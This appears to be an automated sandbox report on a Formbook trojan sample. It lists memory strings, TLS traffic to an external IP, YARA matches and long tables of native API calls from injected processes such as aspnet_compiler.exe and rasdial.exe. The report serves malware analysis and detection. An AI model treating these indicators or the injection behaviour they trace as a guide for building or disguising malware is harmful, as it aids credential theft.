            Source: rasdial.exe, 00000006.00000002.3316528748.0000000002EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: rasdial.exe, 00000006.00000003.2066229054.0000000007C04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: rasdial.exe, 00000006.00000002.3316528748.0000000002EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: rasdial.exe, 00000006.00000002.3316528748.0000000002EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033A
            Source: rasdial.exe, 00000006.00000002.3316528748.0000000002EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: rasdial.exe, 00000006.00000002.3316528748.0000000002EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: rasdial.exe, 00000006.00000002.3321200488.0000000007C2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: rasdial.exe, 00000006.00000002.3319482531.0000000005CDE000.00000004.10000000.00040000.00000000.sdmp, crUcuBAsmdG.exe, 00000009.00000002.3318476241.0000000003B7E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.zoho.com/sites/?src=parkeddomain&dr=www.lanxuanz.tech
            Source: rasdial.exe, 00000006.00000002.3319482531.0000000005CDE000.00000004.10000000.00040000.00000000.sdmp, crUcuBAsmdG.exe, 00000009.00000002.3318476241.0000000003B7E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.zoho.com/sites/images/professionally-crafted-themes.png
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownHTTPS traffic detected: 89.42.218.72:443 -> 192.168.2.8:49706 version: TLS 1.2

            E-Banking Fraud

            Source: Yara matchFile source: 3.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3318244175.0000000004890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3318289936.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1889593144.0000000001920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3320183434.00000000053F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1890039975.00000000045D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 3.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 3.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3318244175.0000000004890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3318289936.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.1889593144.0000000001920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3320183434.00000000053F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.1890039975.00000000045D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0042C0F3 NtClose,3_2_0042C0F3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2B60 NtClose,LdrInitializeThunk,3_2_01AF2B60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01AF2DF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01AF2C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF35C0 NtCreateMutant,LdrInitializeThunk,3_2_01AF35C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF4340 NtSetContextThread,3_2_01AF4340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF4650 NtSuspendThread,3_2_01AF4650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2BA0 NtEnumerateValueKey,3_2_01AF2BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2B80 NtQueryInformationFile,3_2_01AF2B80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2BE0 NtQueryValueKey,3_2_01AF2BE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2BF0 NtAllocateVirtualMemory,3_2_01AF2BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2AB0 NtWaitForSingleObject,3_2_01AF2AB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2AF0 NtWriteFile,3_2_01AF2AF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2AD0 NtReadFile,3_2_01AF2AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2DB0 NtEnumerateKey,3_2_01AF2DB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2DD0 NtDelayExecution,3_2_01AF2DD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2D30 NtUnmapViewOfSection,3_2_01AF2D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2D00 NtSetInformationFile,3_2_01AF2D00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2D10 NtMapViewOfSection,3_2_01AF2D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2CA0 NtQueryInformationToken,3_2_01AF2CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2CF0 NtOpenProcess,3_2_01AF2CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2CC0 NtQueryVirtualMemory,3_2_01AF2CC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2C00 NtQueryInformationProcess,3_2_01AF2C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2C60 NtCreateKey,3_2_01AF2C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2FA0 NtQuerySection,3_2_01AF2FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2FB0 NtResumeThread,3_2_01AF2FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2F90 NtProtectVirtualMemory,3_2_01AF2F90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2FE0 NtCreateFile,3_2_01AF2FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2F30 NtCreateSection,3_2_01AF2F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2F60 NtCreateProcessEx,3_2_01AF2F60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2EA0 NtAdjustPrivilegesToken,3_2_01AF2EA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2E80 NtReadVirtualMemory,3_2_01AF2E80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2EE0 NtQueueApcThread,3_2_01AF2EE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2E30 NtWriteVirtualMemory,3_2_01AF2E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF3090 NtSetValueKey,3_2_01AF3090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF3010 NtOpenDirectoryObject,3_2_01AF3010
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF39B0 NtGetContextThread,3_2_01AF39B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF3D10 NtOpenProcessToken,3_2_01AF3D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF3D70 NtOpenThread,3_2_01AF3D70
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B64650 NtSuspendThread,LdrInitializeThunk,6_2_04B64650
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B64340 NtSetContextThread,LdrInitializeThunk,6_2_04B64340
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_04B62CA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_04B62C70
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62C60 NtCreateKey,LdrInitializeThunk,6_2_04B62C60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_04B62DF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62DD0 NtDelayExecution,LdrInitializeThunk,6_2_04B62DD0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_04B62D30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62D10 NtMapViewOfSection,LdrInitializeThunk,6_2_04B62D10
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_04B62E80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62EE0 NtQueueApcThread,LdrInitializeThunk,6_2_04B62EE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62FB0 NtResumeThread,LdrInitializeThunk,6_2_04B62FB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62FE0 NtCreateFile,LdrInitializeThunk,6_2_04B62FE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62F30 NtCreateSection,LdrInitializeThunk,6_2_04B62F30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62AF0 NtWriteFile,LdrInitializeThunk,6_2_04B62AF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62AD0 NtReadFile,LdrInitializeThunk,6_2_04B62AD0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_04B62BA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04B62BF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62BE0 NtQueryValueKey,LdrInitializeThunk,6_2_04B62BE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62B60 NtClose,LdrInitializeThunk,6_2_04B62B60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B635C0 NtCreateMutant,LdrInitializeThunk,6_2_04B635C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B639B0 NtGetContextThread,LdrInitializeThunk,6_2_04B639B0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62CF0 NtOpenProcess,6_2_04B62CF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62CC0 NtQueryVirtualMemory,6_2_04B62CC0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62C00 NtQueryInformationProcess,6_2_04B62C00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62DB0 NtEnumerateKey,6_2_04B62DB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62D00 NtSetInformationFile,6_2_04B62D00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62EA0 NtAdjustPrivilegesToken,6_2_04B62EA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62E30 NtWriteVirtualMemory,6_2_04B62E30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62FA0 NtQuerySection,6_2_04B62FA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62F90 NtProtectVirtualMemory,6_2_04B62F90
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62F60 NtCreateProcessEx,6_2_04B62F60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62AB0 NtWaitForSingleObject,6_2_04B62AB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B62B80 NtQueryInformationFile,6_2_04B62B80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B63090 NtSetValueKey,6_2_04B63090
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B63010 NtOpenDirectoryObject,6_2_04B63010
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B63D10 NtOpenProcessToken,6_2_04B63D10
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B63D70 NtOpenThread,6_2_04B63D70
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02C68AF0 NtCreateFile,6_2_02C68AF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02C68F50 NtAllocateVirtualMemory,6_2_02C68F50
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02C68C60 NtReadFile,6_2_02C68C60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02C68DF0 NtClose,6_2_02C68DF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02C68D50 NtDeleteFile,6_2_02C68D50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B34F403_2_01B34F40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7CE933_2_01B7CE93
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AD2E903_2_01AD2E90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7EEDB3_2_01B7EEDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7EE263_2_01B7EE26
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0E593_2_01AC0E59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ACB1B03_2_01ACB1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF516C3_2_01AF516C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B8B16B3_2_01B8B16B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AAF1723_2_01AAF172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7F0E03_2_01B7F0E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B770E93_2_01B770E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC70C03_2_01AC70C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B6F0CC3_2_01B6F0CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B0739A3_2_01B0739A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7132D3_2_01B7132D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AAD34C3_2_01AAD34C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC52A03_2_01AC52A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B612ED3_2_01B612ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ADB2C03_2_01ADB2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5D5B03_2_01B5D5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B895C33_2_01B895C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B775713_2_01B77571
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7F43F3_2_01B7F43F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB14603_2_01AB1460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7F7B03_2_01B7F7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B716CC3_2_01B716CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B056303_2_01B05630
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B559103_2_01B55910
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC99503_2_01AC9950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ADB9503_2_01ADB950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC38E03_2_01AC38E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2D8003_2_01B2D800
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ADFB803_2_01ADFB80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B35BF03_2_01B35BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AFDBF93_2_01AFDBF9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7FB763_2_01B7FB76
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B05AA03_2_01B05AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B61AA33_2_01B61AA3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5DAAC3_2_01B5DAAC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B6DAC63_2_01B6DAC6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B33A6C3_2_01B33A6C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B77A463_2_01B77A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7FA493_2_01B7FA49
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ADFDC03_2_01ADFDC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B77D733_2_01B77D73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC3D403_2_01AC3D40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B71D5A3_2_01B71D5A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7FCF23_2_01B7FCF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B39C323_2_01B39C32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7FFB13_2_01B7FFB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC1F923_2_01AC1F92
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01A83FD23_2_01A83FD2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01A83FD53_2_01A83FD5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7FF093_2_01B7FF09
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC9EB03_2_01AC9EB0
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeCode function: 5_2_059A15B95_2_059A15B9
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeCode function: 5_2_059B7C775_2_059B7C77
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeCode function: 5_2_05998E655_2_05998E65
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeCode function: 5_2_05998E675_2_05998E67
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeCode function: 5_2_059971075_2_05997107
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeCode function: 5_2_059990875_2_05999087
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeCode function: 5_2_0599F8025_2_0599F802
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeCode function: 5_2_0599F8075_2_0599F807
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BDE4F66_2_04BDE4F6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BD44206_2_04BD4420
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BE24466_2_04BE2446
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BF05916_2_04BF0591
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B305356_2_04B30535
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B4C6E06_2_04B4C6E0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B2C7C06_2_04B2C7C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B307706_2_04B30770
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B547506_2_04B54750
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BC20006_2_04BC2000
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BF01AA6_2_04BF01AA
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BE41A26_2_04BE41A2
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BE81CC6_2_04BE81CC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BCA1186_2_04BCA118
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B201006_2_04B20100
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BB81586_2_04BB8158
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BB02C06_2_04BB02C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BD02746_2_04BD0274
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B3E3F06_2_04B3E3F0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BF03E66_2_04BF03E6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BEA3526_2_04BEA352
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BD0CB56_2_04BD0CB5
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B20CF26_2_04B20CF2
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B30C006_2_04B30C00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B48DBF6_2_04B48DBF
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B2ADE06_2_04B2ADE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BCCD1F6_2_04BCCD1F
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B3AD006_2_04B3AD00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04B42E906_2_04B42E90
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BECE936_2_04BECE93
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04BEEEDB6_2_04BEEEDB
